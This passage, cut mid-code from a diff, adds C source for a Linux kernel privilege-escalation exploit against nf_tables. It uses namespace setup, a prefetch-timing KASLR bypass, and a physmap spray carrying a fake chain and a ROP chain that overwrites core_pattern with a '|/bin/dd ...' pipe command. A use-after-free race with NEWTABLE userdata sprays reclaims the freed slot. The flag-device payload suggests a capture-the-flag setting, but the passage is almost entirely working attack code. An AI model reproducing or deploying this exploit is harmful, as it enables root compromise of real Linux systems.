uint16_t t, uint32_t v) { + v = htonl(v); return nlbuf_put(b, h, t, &v, 4); +} + +static int nl_strz(struct nlbuf *b, struct nlmsghdr *h, uint16_t t, const char *s) { + return nlbuf_put(b, h, t, s, strlen(s) + 1); +} + +/* ========== netlink socket ========== */ +struct nlsock { int fd; uint32_t pid; }; + +static struct nlsock nl_open(void) { + struct nlsock s = {-1, 0}; + int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER); + if (fd < 0) return s; + struct sockaddr_nl sa = {.nl_family = AF_NETLINK}; + if (bind(fd, (void *)&sa, sizeof(sa)) < 0) { close(fd); return s; } + socklen_t sl = sizeof(sa); + getsockname(fd, (void *)&sa, &sl); + s.pid = sa.nl_pid; s.fd = fd; + int bufsz = 8<<20; + setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &bufsz, sizeof(bufsz)); + setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &bufsz, sizeof(bufsz)); + int fl = fcntl(fd, F_GETFL, 0); + if (fl >= 0) fcntl(fd, F_SETFL, fl | O_NONBLOCK); + return s; +} + +static int nl_send(int fd, const void *buf, size_t len) { + struct sockaddr_nl sa = {.nl_family = AF_NETLINK}; + struct iovec iov = {(void *)buf, len}; + struct msghdr msg = {&sa, sizeof(sa), &iov, 1, NULL, 0, 0}; + return sendmsg(fd, &msg, 0) < 0 ? -1 : 0; +} + +static int nl_drain(int fd) { + uint8_t buf[16384]; + for (;;) { + ssize_t r = recv(fd, buf, sizeof(buf), MSG_DONTWAIT); + if (r <= 0) break; + } + return 0; +} + +static int nl_wait_acks(int fd, int n, int tmo_ms) { + struct timespec start, now; + clock_gettime(CLOCK_MONOTONIC, &start); + int seen = 0, last = 0; + uint8_t buf[16384]; + while (seen < n) { + ssize_t r = recv(fd, buf, sizeof(buf), MSG_DONTWAIT); + if (r > 0) { + int rem = r; + for (struct nlmsghdr *h = (void *)buf; NLMSG_OK(h, rem); h = NLMSG_NEXT(h, rem)) { + if (h->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = NLMSG_DATA(h); + seen++; last = e->error; + } + } + } + clock_gettime(CLOCK_MONOTONIC, &now); + long ms = (now.tv_sec-start.tv_sec)*1000 + (now.tv_nsec-start.tv_nsec)/1000000; + if (ms > tmo_ms) return -ETIMEDOUT; + if (r <= 0) { struct timespec sl = {0, 500000}; nanosleep(&sl, NULL); } + } + return last; +} + +/* ========== batch helpers ========== */ +#define NFT_T(msg) ((NFNL_SUBSYS_NFTABLES << 8) | (msg)) +#define NLC (NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL) + +static int batch_begin(struct nlbuf *b, uint32_t seq, uint32_t pid) { + return nlbuf_begin_msg(b, NFNL_MSG_BATCH_BEGIN, NLM_F_REQUEST, seq, pid, + NFPROTO_INET, NFNL_SUBSYS_NFTABLES) ? 0 : -1; +} +static int batch_end(struct nlbuf *b, uint32_t seq, uint32_t pid) { + return nlbuf_begin_msg(b, NFNL_MSG_BATCH_END, NLM_F_REQUEST, seq, pid, + NFPROTO_INET, NFNL_SUBSYS_NFTABLES) ? 0 : -1; +} + +/* ========== namespace setup ========== */ +static void xwrite(const char *p, const char *s) { + int fd = open(p, O_WRONLY|O_CLOEXEC); + if (fd < 0) die(p); + write(fd, s, strlen(s)); close(fd); +} + +static void setup_ns(void) { + uid_t u = getuid(); gid_t g = getgid(); + if (u == 0) { + setresgid(1000,1000,1000); setresuid(1000,1000,1000); + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + u = getuid(); g = getgid(); + } + if (unshare(CLONE_NEWUSER) < 0) die("unshare(USER)"); + xwrite("/proc/self/setgroups", "deny\n"); + char m[64]; + snprintf(m, sizeof(m), "0 %u 1\n", u); xwrite("/proc/self/uid_map", m); + snprintf(m, sizeof(m), "0 %u 1\n", g); xwrite("/proc/self/gid_map", m); + setresgid(0,0,0); setresuid(0,0,0); + if (unshare(CLONE_NEWNET) < 0) die("unshare(NET)"); + int fd = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (fd >= 0) { + struct ifreq ifr = {0}; + strncpy(ifr.ifr_name, "lo", IFNAMSIZ-1); + ioctl(fd, SIOCGIFFLAGS, &ifr); + ifr.ifr_flags |= IFF_UP|IFF_RUNNING; + ioctl(fd, SIOCSIFFLAGS, &ifr); + close(fd); + } +} + +/* forward declaration for pin_cpu (defined later, used by entrybleed) */ +static void pin_cpu(int cpu); + +/* ========== KASLR bypass (prefetch timing, adapted from Hc0wl/CVE-2026-23074) ========== */ +#ifdef __x86_64__ + +/* + * Timing primitives from IAIK/prefetch + Hc0wl's kaslr_bypass.c. + * Key difference from standard EntryBleed: uses mfence+RDTSCP (not lfence+RDTSC) + * and prefetchnta+prefetcht2 (not prefetcht0). Works on Intel Sapphire Rapids. + */ +static inline __attribute__((always_inline)) uint64_t rdtsc_begin(void) { + uint64_t a, d; + asm volatile("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static inline __attribute__((always_inline)) uint64_t rdtsc_end(void) { + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static uint64_t time_prefetch(const void *p, int n) { + uint64_t best = ~0ULL; + for (int i = 0; i < n; i++) { + uint64_t t1 = rdtsc_begin(); + asm volatile("prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : : "r"(p)); + uint64_t delta = rdtsc_end() - t1; + if (delta < best) best = delta; + } + return best; +} + +/* Cluster analysis: extract top clusters from raw measurements. + * Groups values within `window` of each other, picks clusters by size. */ +static void eb_cluster_extract(uint64_t *raw, int n, uint64_t *out, int *nout, + int max_out, uint64_t window) { + int used[32] = {0}; + *nout = 0; + while (*nout < max_out) { + uint64_t best_c = 0; + int best_n = 0; + for (int i = 0; i < n; i++) { + if (used[i]) continue; + int cnt = 0; + for (int j = 0; j < n; j++) { + if (used[j]) continue; + uint64_t d = raw[i] > raw[j] ? raw[i]-raw[j] : raw[j]-raw[i]; + if (d <= window) cnt++; + } + if (cnt > best_n) { best_n = cnt; best_c = raw[i]; } + } + if (best_n == 0) break; + out[(*nout)++] = best_c; + printf("[+] cluster[%d]: %#lx (%d/%d)\n", *nout-1, + (unsigned long)best_c, best_n, n); + for (int j = 0; j < n; j++) { + if (!used[j]) { + uint64_t d = best_c > raw[j] ? best_c-raw[j] : raw[j]-best_c; + if (d <= window) used[j] = 1; + } + } + } +} + +/* + * kbase detection: two-phase scan. + * Phase 1: 16MB steps over 1.25GB (as in Hc0wl), find coarse 16MB block. + * Phase 2: 2MB steps within ±16MB of coarse result, find exact 2MB-aligned kbase. + * 7-vote majority per phase, retry until consensus. + */ +static uint64_t detect_kbase(void) { + #define KB_START 0xffffffff81000000ULL + #define KB_END 0xffffffffD0000000ULL + #define KB_COARSE 0x1000000ULL /* 16MB */ + #define KB_FINE 0x200000ULL /* 2MB */ + #define KB_VOTES 7 + + /* Phase 1: coarse scan (16MB steps) */ + printf("[*] kbase: coarse scan (16MB steps, %d votes)...\n", KB_VOTES); + uint64_t coarse = KB_START; + for (int attempt = 0; attempt < 5; attempt++) { + uint64_t votes[KB_VOTES]; + for (int v = 0; v < KB_VOTES; v++) { + int naddr = (int)((KB_END - KB_START) / KB_COARSE); + uint64_t best_t = ~0ULL, best_a = KB_START; + for (int ti = 0; ti < naddr; ti++) { + uint64_t addr = KB_START + KB_COARSE * (uint64_t)ti; + uint64_t t = time_prefetch((void *)addr, 16); + if (t < best_t) { best_t = t; best_a = addr; } + } + votes[v] = best_a; + } + + /* Boyer-Moore majority vote */ + uint64_t cand = votes[0]; int cnt = 1; + for (int i = 1; i < KB_VOTES; i++) { + if (cnt == 0) { cand = votes[i]; cnt = 1; } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < KB_VOTES; i++) if (votes[i] == cand) cnt++; + + printf("[*] kbase coarse: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, KB_VOTES); + + if (cnt > KB_VOTES / 2) { coarse = cand; break; } + printf("[*] kbase: retrying coarse scan...\n"); + } + + /* Phase 2: fine scan (2MB steps around coarse result) */ + printf("[*] kbase: fine scan (2MB steps around %#lx)...\n", + (unsigned long)coarse); + uint64_t fine_start = (coarse > KB_START + KB_COARSE) ? + coarse - KB_COARSE : KB_START; + uint64_t fine_end = coarse + 2 * KB_COARSE; + if (fine_end > KB_END) fine_end = KB_END; + + uint64_t result = coarse; + for (int attempt = 0; attempt < 3; attempt++) { + uint64_t votes[KB_VOTES]; + for (int v = 0; v < KB_VOTES; v++) { + uint64_t best_t = ~0ULL, best_a = coarse; + for (uint64_t addr = fine_start; addr < fine_end; addr += KB_FINE) { + uint64_t t = time_prefetch((void *)addr, 32); + if (t < best_t) { best_t = t; best_a = addr; } + } + votes[v] = best_a; + } + + uint64_t cand = votes[0]; int cnt = 1; + for (int i = 1; i < KB_VOTES; i++) { + if (cnt == 0) { cand = votes[i]; cnt = 1; } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < KB_VOTES; i++) if (votes[i] == cand) cnt++; + + printf("[*] kbase fine: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, KB_VOTES); + + if (cnt > KB_VOTES / 2) { result = cand; break; } + } + + return result; +} + +/* + * phbase detection: two-phase scan over direct map range. + * CONFIG_RANDOMIZE_MEMORY can shift page_offset_base by up to ~8TB. + * Phase 1: 256GB coarse steps over 16TB → find ~256GB region. + * Phase 2: 1GB fine steps within ±128GB → find exact 1GB-aligned base. + */ +static uint64_t detect_phbase(void) { + #define PB_START 0xffff888000000000ULL + #define PB_COARSE 0x4000000000ULL /* 256GB */ + #define PB_CRANGE 0x100000000000ULL /* 16TB coarse range */ + #define PB_STEP 0x40000000ULL /* 1GB */ + #define PB_VOTES 7 + + /* Phase 1: coarse scan (256GB steps over 16TB) = 64 addresses per vote */ + printf("[*] phbase: coarse scan (256GB steps, 16TB range, %d votes)...\n", PB_VOTES); + uint64_t coarse = PB_START; + for (int attempt = 0; attempt < 10; attempt++) { + uint64_t votes[PB_VOTES]; + int naddr = (int)(PB_CRANGE / PB_COARSE); /* 64 */ + for (int v = 0; v < PB_VOTES; v++) { + uint64_t best_t = ~0ULL, best_a = PB_START; + for (int ti = 0; ti < naddr; ti++) { + uint64_t addr = PB_START + PB_COARSE * (uint64_t)ti; + uint64_t t = time_prefetch((void *)addr, 40); + if (t < best_t) { best_t = t; best_a = addr; } + } + votes[v] = best_a; + } + + uint64_t cand = votes[0]; int cnt = 1; + for (int i = 1; i < PB_VOTES; i++) { + if (cnt == 0) { cand = votes[i]; cnt = 1; } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < PB_VOTES; i++) if (votes[i] == cand) cnt++; + + printf("[*] phbase coarse: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, PB_VOTES); + if (cnt > PB_VOTES / 2) { coarse = cand; break; } + if (attempt < 9) printf("[*] phbase: retrying coarse...\n"); + } + + /* Phase 2: fine scan (1GB steps within ±128GB of coarse result) = ~256 addrs */ + uint64_t fine_start = (coarse > PB_START + PB_COARSE/2) ? + coarse - PB_COARSE/2 : PB_START; + uint64_t fine_end = coarse + PB_COARSE + PB_COARSE/2; + printf("[*] phbase: fine scan (1GB steps, %#lx-%#lx)...\n", + (unsigned long)fine_start, (unsigned long)fine_end); + + uint64_t result = coarse; + for (int attempt = 0; attempt < 5; attempt++) { + uint64_t votes[PB_VOTES]; + for (int v = 0; v < PB_VOTES; v++) { + uint64_t best_t = ~0ULL, best_a = coarse; + for (uint64_t addr = fine_start; addr < fine_end; addr += PB_STEP) { + uint64_t t = time_prefetch((void *)addr, 40); + if (t < best_t) { best_t = t; best_a = addr; } + } + votes[v] = best_a; + } + + uint64_t cand = votes[0]; int cnt = 1; + for (int i = 1; i < PB_VOTES; i++) { + if (cnt == 0) { cand = votes[i]; cnt = 1; } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < PB_VOTES; i++) if (votes[i] == cand) cnt++; + + printf("[*] phbase fine: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, PB_VOTES); + if (cnt > PB_VOTES / 2) { result = cand; break; } + } + + /* Apply -4GB KVM correction if result is above default + 4GB */ + if (result > PB_START + 0x100000000ULL) { + uint64_t corrected = result - 0x100000000ULL; + printf("[+] phbase KVM corrected: %#lx -> %#lx\n", + (unsigned long)result, (unsigned long)corrected); + result = corrected; + } + + return result; +} + +static void do_entrybleed(void) { + pin_cpu(0); + + /* Detect kbase */ + uint64_t kb = detect_kbase(); + eb_kbases[0] = kb; eb_nkb = 1; + kbase = kb; + printf("[+] kbase=%#lx\n", (unsigned long)kbase); + + /* Also store the coarse result ±16MB as alternative candidates */ + if (eb_nkb < MAX_EB_CANDS) eb_kbases[eb_nkb++] = kb - KB_COARSE; + if (eb_nkb < MAX_EB_CANDS) eb_kbases[eb_nkb++] = kb + KB_COARSE; + + /* Skip phbase detection — not needed for __init_begin approach. + * The fake chain lives at kbase + OFF_INIT_BEGIN + offset, + * which is kbase-relative and doesn't need phbase. */ + phbase = 0xffff888000000000ULL; /* placeholder for pagemap fallback only */ + eb_phbases[0] = phbase; eb_npb = 1; +} +#else +static void do_entrybleed(void) { die("x86_64 only"); } +#endif + +/* ========== physmap (MAP_SHARED for post-fork updates) ========== */ +static void physmap_spray(void) { + size_t sz = (size_t)physmap_mb << 20; + phys_region = mmap(NULL, sz, PROT_READ|PROT_WRITE, + MAP_SHARED|MAP_ANONYMOUS|MAP_POPULATE, -1, 0); + if (phys_region == MAP_FAILED) die("mmap physmap"); + printf("[+] physmap: %d MB at %p\n", physmap_mb, phys_region); +} + +static uint64_t read_physmap_kva(void) { + int fd = open("/proc/self/pagemap", O_RDONLY); + if (fd < 0) return 0; + uint64_t entry = 0; + pread(fd, &entry, 8, (off_t)((uint64_t)phys_region / 4096) * 8); + close(fd); + if (!(entry & (1ULL << 63))) return 0; + uint64_t pfn = entry & ((1ULL << 55) - 1); + if (!pfn) return 0; + return phbase + pfn * 4096; +} + +/* + * Fill every physmap page with the ROP blob. + * + * Page layout (4096 bytes): + * +0x000: Fake nft_chain (96 bytes) + * +0: blob_gen_0 = page_kva + 0x80 + * +8: blob_gen_1 = page_kva + 0x80 + * +64: table = kbase (safe readable address) + * +80: use = 1 + * +84: flags = 0 + * +88: name = page_kva + 0x1C0 + * +0x080: Fake nft_rule_blob + * +0: size = 0x90 (covers rules + terminator = 144 bytes) + * +8: rule_dp: dlen=128, is_last=0 (value 0x100) + * +16: expr[0] (32B): dreg=130, [pop_rsi, src_va] -> return addr + * +48: expr[1] (32B): dreg=134, [pop_rdi, core_pattern] + * +80: expr[2] (32B): dreg=138, [strcpy, pop_rdi] + * +112: expr[3] (32B): dreg=142, [0x7FFFFFFF, msleep] + * +144: terminator rule_dp: is_last=1 + * +0x1C0: Name string "x\0" + * +0x200: Payload string "|/bin/dd if=/dev/vd[b|a] of=/dev/ttyS0\0" + * + * nft_do_chain stack layout (6.1.155, sub $0x220,%rsp): + * regs at rsp+0x48 + * canary at rsp+0x218 + * saved regs at rsp+0x220..0x248 + * return address at rsp+0x250 + * dreg=130 -> rsp+0x48+130*4 = rsp+0x250 = return addr + * dreg=134 -> rsp+0x260 + * dreg=138 -> rsp+0x270 + * dreg=142 -> rsp+0x280 + * + * ROP chain (4 expressions, 32 bytes each): + * expr[0] dreg=130 dlen=16: pop_rsi_rdi | src_va -> enter pop_rsi;pop_rdi;ret + * expr[1] dreg=134 dlen=16: core_pattern| strcpy -> RDI=core_pattern, ret→strcpy + * expr[2] dreg=138 dlen=16: pop_rdi | 0x7FFFFFFF -> RDI=sleep_ms + * expr[3] dreg=142 dlen=16: msleep | 0 -> park thread + */ +static void physmap_fill_rop(void) { + uint64_t nft_imm_ops = kbase + OFF_NFT_IMM_OPS; + uint64_t core_pattern = kbase + OFF_CORE_PATTERN; + uint64_t pop_rdi = kbase + OFF_POP_RDI; + uint64_t pop_rsi_rdi = kbase + OFF_POP_RSI_RDI; + uint64_t strcpy_va = kbase + OFF_STRCPY; + uint64_t msleep_va = kbase + OFF_MSLEEP; + uint64_t src_va = g_page_kva + PATH_OFFSET; + + uint8_t page[4096]; + memset(page, 0, sizeof(page)); + + /* ---- Fake nft_chain at page+0 ---- */ + uint64_t blob_ptr = g_page_kva + BLOB_OFFSET; + memcpy(page + CHAIN_OFF_BLOB0, &blob_ptr, 8); + memcpy(page + CHAIN_OFF_BLOB1, &blob_ptr, 8); + uint64_t tbl = kbase; + memcpy(page + CHAIN_OFF_TABLE, &tbl, 8); + uint32_t use = 1; + memcpy(page + CHAIN_OFF_USE, &use, 4); + page[CHAIN_OFF_FLAGS] = 0; + uint64_t name_ptr = g_page_kva + NAME_OFFSET; + memcpy(page + CHAIN_OFF_NAME, &name_ptr, 8); + + /* ---- Name string at page+0x1C0 ---- */ + page[NAME_OFFSET] = 'x'; page[NAME_OFFSET+1] = 0; + + /* ---- Payload string at page+0x200 ---- */ + char payload[64]; + const char *flag_dev = pick_flag_device(); + int n = snprintf(payload, sizeof(payload), + "|/bin/dd if=%s of=/dev/ttyS0", flag_dev); + if (n < 0 || (size_t)n >= sizeof(payload)) + die("snprintf core_pattern payload"); + printf("[*] core_pattern payload device: %s\n", flag_dev); + memcpy(page + PATH_OFFSET, payload, strlen(payload) + 1); + + /* ---- Fake nft_rule_blob at page+0x80 ---- */ + uint8_t *blob = page + BLOB_OFFSET; + + /* blob->size: must cover data section (rule_dp + 4 exprs + terminator) + * = 8 + 4*32 + 8 = 144 = 0x90 */ + uint64_t blob_size = 0x90; + memcpy(blob, &blob_size, 8); + + /* First rule_dp: dlen=128, is_last=0 -> value = 128<<1 | 0 = 0x100 */ + uint64_t rdp = 0x100; + memcpy(blob + 8, &rdp, 8); + + /* + * 4 nft_immediate expressions, 32 bytes each (8B ops + 24B private data): + * ops->size = 0x20 = 32 -> this IS the total expression stride + * +0x00: ops pointer (8 bytes) -> nft_imm_ops + * +0x08: data[0:8] = first ROP qword + * +0x10: data[8:16] = second ROP qword + * +0x18: dreg (u8) + * +0x19: dlen (u8) + * +0x1A-0x1F: padding (6 bytes) + * + * No NFT_CONTINUE expression needed: the kernel sets + * regs.verdict.code = NFT_CONTINUE at the start of each rule. + */ + + /* Expression 0 at blob+16 (dreg=130): pop_rsi_rdi | src_va + * ROP: ret addr → pop_rsi_rdi, pops src_va into RSI */ + uint8_t *e = blob + 16; + memcpy(e, &nft_imm_ops, 8); + *(uint64_t *)(e + 8) = pop_rsi_rdi; + *(uint64_t *)(e + 16) = src_va; + e[24] = 130; e[25] = 16; + + /* Expression 1 at blob+48 (dreg=134): core_pattern | strcpy + * ROP: pop_rdi gets core_pattern into RDI, return_thunk → strcpy */ + e = blob + 48; + memcpy(e, &nft_imm_ops, 8); + *(uint64_t *)(e + 8) = core_pattern; + *(uint64_t *)(e + 16) = strcpy_va; + e[24] = 134; e[25] = 16; + + /* Expression 2 at blob+80 (dreg=138): pop_rdi | 0x7FFFFFFF + * ROP: strcpy returns → pop_rdi, pops 0x7FFFFFFF into RDI */ + e = blob + 80; + memcpy(e, &nft_imm_ops, 8); + *(uint64_t *)(e + 8) = pop_rdi; + *(uint64_t *)(e + 16) = 0x7FFFFFFFULL; + e[24] = 138; e[25] = 16; + + /* Expression 3 at blob+112 (dreg=142): msleep | 0 + * ROP: pop_rdi returns → msleep(0x7FFFFFFF), parks thread */ + e = blob + 112; + memcpy(e, &nft_imm_ops, 8); + *(uint64_t *)(e + 8) = msleep_va; + *(uint64_t *)(e + 16) = 0; + e[24] = 142; e[25] = 16; + + /* Terminator rule_dp at blob+144: is_last=1 */ + uint64_t term = 1; + memcpy(blob + 144, &term, 8); + + /* Fill all physmap pages */ + size_t sz = (size_t)physmap_mb << 20; + for (size_t o = 0; o < sz; o += 4096) + memcpy((uint8_t *)phys_region + o, page, sizeof(page)); + printf("[+] physmap filled with ROP chain (kva=%#lx)\n", + (unsigned long)g_page_kva); +} + +/* ========== in-batch spray: NEWTABLE userdata for kmalloc-cg-64 ========== */ +/* + * Build spray userdata (52 bytes) that overlays a freed nft_hash_elem. + * When kmemdup copies this into the reclaimed slot, the reader's stale + * ext pointer will find a valid element with NFT_GOTO(physmap_chain). + * + * Object layout (kmalloc-cg-64, element with key_len=4 verdict map): + * +0: hlist_node.next (8B) - reader already past this + * +8: hlist_node.pprev (8B) - reader already past this + * +16: ext.genmask (1B) = 0 (active) + * +17: ext.offset[KEY] (1B) = 16 (KEY at ext+16 = obj+32) + * +18: ext.offset[1] (1B) = 0 + * +19: ext.offset[DATA] (1B) = 20 (DATA at ext+20 = obj+36) + * +32: KEY data (4B) = htonl(KEY_RACE) + * +36: verdict.code (4B) = NFT_GOTO + * +40: verdict padding (4B) = 0 + * +44: verdict.chain (8B) = physmap fake chain KVA + */ +static void build_spray_udata(uint8_t udata[SPRAY_UDATA_LEN], uint64_t chain_kva) { + memset(udata, 0, SPRAY_UDATA_LEN); + udata[16] = 0; /* ext.genmask = 0 (active in current generation) */ + udata[17] = 16; /* ext.offset[KEY] = 16 */ + udata[19] = 20; /* ext.offset[DATA] = 20 */ + *(uint32_t *)(udata + 32) = htonl(KEY_RACE); + *(uint32_t *)(udata + 36) = NFT_GOTO_CODE; + *(uint64_t *)(udata + 44) = chain_kva; +} + +/* ========== nft object creation ========== */ +static int nft_setup_all(int fd, uint32_t pid) { + uint8_t buf[65536]; + struct nlbuf b; + nlbuf_init(&b, buf, sizeof(buf)); + uint32_t seq = 1; + + batch_begin(&b, seq++, pid); + + /* 1. Table */ + struct nlmsghdr *h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWTABLE), NLC, + seq++, pid, NFPROTO_INET, 0); + nl_strz(&b, h, NFTA_TABLE_NAME, "t"); + + /* 2. Base chain (LOCAL_OUT hook) */ + h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWCHAIN), NLC, seq++, pid, NFPROTO_INET, 0); + nl_strz(&b, h, NFTA_CHAIN_TABLE, "t"); + nl_strz(&b, h, NFTA_CHAIN_NAME, "bc"); + struct nlattr *hk = nlbuf_nest_start(&b, h, NFTA_CHAIN_HOOK); + nl_u32be(&b, h, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT); + nl_u32be(&b, h, NFTA_HOOK_PRIORITY, (uint32_t)NF_IP_PRI_FILTER); + nlbuf_nest_end(&b, hk); + + /* 3. Verdict map (hash, size=1, key_len=4) */ + h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWSET), NLC, seq++, pid, NFPROTO_INET, 0); + nl_strz(&b, h, NFTA_SET_TABLE, "t"); + nl_strz(&b, h, NFTA_SET_NAME, "vm"); + nl_u32be(&b, h, NFTA_SET_FLAGS, NFT_SET_MAP); + nl_u32be(&b, h, NFTA_SET_KEY_LEN, 4); + nl_u32be(&b, h, NFTA_SET_DATA_TYPE, 0xffffff00u); + nl_u32be(&b, h, NFTA_SET_DATA_LEN, 16); + nl_u32be(&b, h, NFTA_SET_ID, 99); + nl_u32be(&b, h, NFTA_SET_POLICY, NFT_SET_POL_PERFORMANCE); + struct nlattr *desc = nlbuf_nest_start(&b, h, NFTA_SET_DESC); + nl_u32be(&b, h, NFTA_SET_DESC_SIZE, 1); + nlbuf_nest_end(&b, desc); + + /* 4. Fill element: key=0, verdict=NF_ACCEPT */ + h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWSETELEM), + NLM_F_REQUEST|NLM_F_ACK|NLM_F_CREATE, seq++, pid, NFPROTO_INET, 0); + nl_strz(&b, h, NFTA_SET_ELEM_LIST_TABLE, "t"); + nl_strz(&b, h, NFTA_SET_ELEM_LIST_SET, "vm"); + struct nlattr *els = nlbuf_nest_start(&b, h, NFTA_SET_ELEM_LIST_ELEMENTS); + struct nlattr *el = nlbuf_nest_start(&b, h, NFTA_LIST_ELEM); + struct nlattr *kn = nlbuf_nest_start(&b, h, NFTA_SET_ELEM_KEY); + uint32_t kf = htonl(KEY_FILL); + nlbuf_put(&b, h, NFTA_DATA_VALUE, &kf, 4); + nlbuf_nest_end(&b, kn); + struct nlattr *dn = nlbuf_nest_start(&b, h, NFTA_SET_ELEM_DATA); + struct nlattr *vn = nlbuf_nest_start(&b, h, NFTA_DATA_VERDICT); + nl_u32be(&b, h, NFTA_VERDICT_CODE, NF_ACCEPT); + nlbuf_nest_end(&b, vn); + nlbuf_nest_end(&b, dn); + nlbuf_nest_end(&b, el); + nlbuf_nest_end(&b, els); + + /* 5. Rule: immediate(KEY_RACE) + lookup(vm) */ + h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWRULE), NLC, seq++, pid, NFPROTO_INET, 0); + nl_strz(&b, h, NFTA_RULE_TABLE, "t"); + nl_strz(&b, h, NFTA_RULE_CHAIN, "bc"); + struct nlattr *exs = nlbuf_nest_start(&b, h, NFTA_RULE_EXPRESSIONS); + { + struct nlattr *e = nlbuf_nest_start(&b, h, NFTA_LIST_ELEM); + nl_strz(&b, h, NFTA_EXPR_NAME, "immediate"); + struct nlattr *ed = nlbuf_nest_start(&b, h, NFTA_EXPR_DATA); + nl_u32be(&b, h, NFTA_IMMEDIATE_DREG, NFT_REG32_00); + struct nlattr *id = nlbuf_nest_start(&b, h, NFTA_IMMEDIATE_DATA); + uint32_t kr = htonl(KEY_RACE); + nlbuf_put(&b, h, NFTA_DATA_VALUE, &kr, 4); + nlbuf_nest_end(&b, id); + nlbuf_nest_end(&b, ed); + nlbuf_nest_end(&b, e); + } + { + struct nlattr *e = nlbuf_nest_start(&b, h, NFTA_LIST_ELEM); + nl_strz(&b, h, NFTA_EXPR_NAME, "lookup"); + struct nlattr *ed = nlbuf_nest_start(&b, h, NFTA_EXPR_DATA); + nl_strz(&b, h, NFTA_LOOKUP_SET, "vm"); + nl_u32be(&b, h, NFTA_LOOKUP_SREG, NFT_REG32_00); + nl_u32be(&b, h, NFTA_LOOKUP_DREG, NFT_REG_VERDICT); + nlbuf_nest_end(&b, ed); + nlbuf_nest_end(&b, e); + } + nlbuf_nest_end(&b, exs); + + batch_end(&b, seq++, pid); + + if (nl_send(fd, b.buf, b.len) < 0) return -1; + return nl_wait_acks(fd, 5, 5000); +} + +/* ========== build race batch: NEWSETELEM + NEWTABLE spray interleaved ========== */ +/* + * Each iteration: NEWSETELEM triggers insert→cap_fail→remove→kfree (slot freed), + * then NEWTABLE with userdata does kmalloc(52, GFP_KERNEL_ACCOUNT) → reclaims + * the freed slot via SLUB LIFO on the same CPU → kmemdup writes spray data. + * + * The batch will be auto-aborted (NFNL_BATCH_FAILURE from -ENOSPC on the + * NEWSETELEM messages), so all spray tables + userdata are freed afterwards. + * Same table names ("s000".."s063") are reusable every batch. + */ +static int build_race_batch(uint8_t *buf, size_t cap, uint32_t *seq, + uint32_t pid, int count, + const uint8_t *spray_udata) { + struct nlbuf b; + nlbuf_init(&b, buf, cap); + batch_begin(&b, (*seq)++, pid); + + char tname[8]; + for (int i = 0; i < count; i++) { + /* NEWSETELEM: insert element with KEY_RACE → err_set_full → kfree */ + struct nlmsghdr *h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWSETELEM), + NLM_F_REQUEST|NLM_F_ACK|NLM_F_CREATE|NLM_F_EXCL, + (*seq)++, pid, NFPROTO_INET, 0); + if (!h) break; + nl_strz(&b, h, NFTA_SET_ELEM_LIST_TABLE, "t"); + nl_strz(&b, h, NFTA_SET_ELEM_LIST_SET, "vm"); + struct nlattr *els = nlbuf_nest_start(&b, h, NFTA_SET_ELEM_LIST_ELEMENTS); + struct nlattr *el = nlbuf_nest_start(&b, h, NFTA_LIST_ELEM); + struct nlattr *kn = nlbuf_nest_start(&b, h, NFTA_SET_ELEM_KEY); + uint32_t kr = htonl(KEY_RACE); + nlbuf_put(&b, h, NFTA_DATA_VALUE, &kr, 4); + nlbuf_nest_end(&b, kn); + struct nlattr *dn = nlbuf_nest_start(&b, h, NFTA_SET_ELEM_DATA); + struct nlattr *vvn = nlbuf_nest_start(&b, h, NFTA_DATA_VERDICT); + nl_u32be(&b, h, NFTA_VERDICT_CODE, NF_ACCEPT); + nlbuf_nest_end(&b, vvn); + nlbuf_nest_end(&b, dn); + nlbuf_nest_end(&b, el); + nlbuf_nest_end(&b, els); + + /* NEWTABLE: spray userdata into kmalloc-cg-64 to reclaim freed slot. + * Uses NFPROTO_IPV4 family to avoid interfering with our INET table. */ + snprintf(tname, sizeof(tname), "s%03d", i); + h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWTABLE), + NLM_F_REQUEST|NLM_F_ACK|NLM_F_CREATE|NLM_F_EXCL, + (*seq)++, pid, NFPROTO_IPV4, 0); + if (!h) break; + nl_strz(&b, h, NFTA_TABLE_NAME, tname); + nlbuf_put(&b, h, NFTA_TABLE_USERDATA, spray_udata, SPRAY_UDATA_LEN); + } + + batch_end(&b, (*seq)++, pid); + return (int)b.len; +} + +/* ========== CPU pinning ========== */ +static void pin_cpu(int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + sched_setaffinity(0, sizeof(set), &set); +} + +/* ========== race threads (writer+spray on CPU0, packet on CPU1) ========== */ +struct race_args { + int 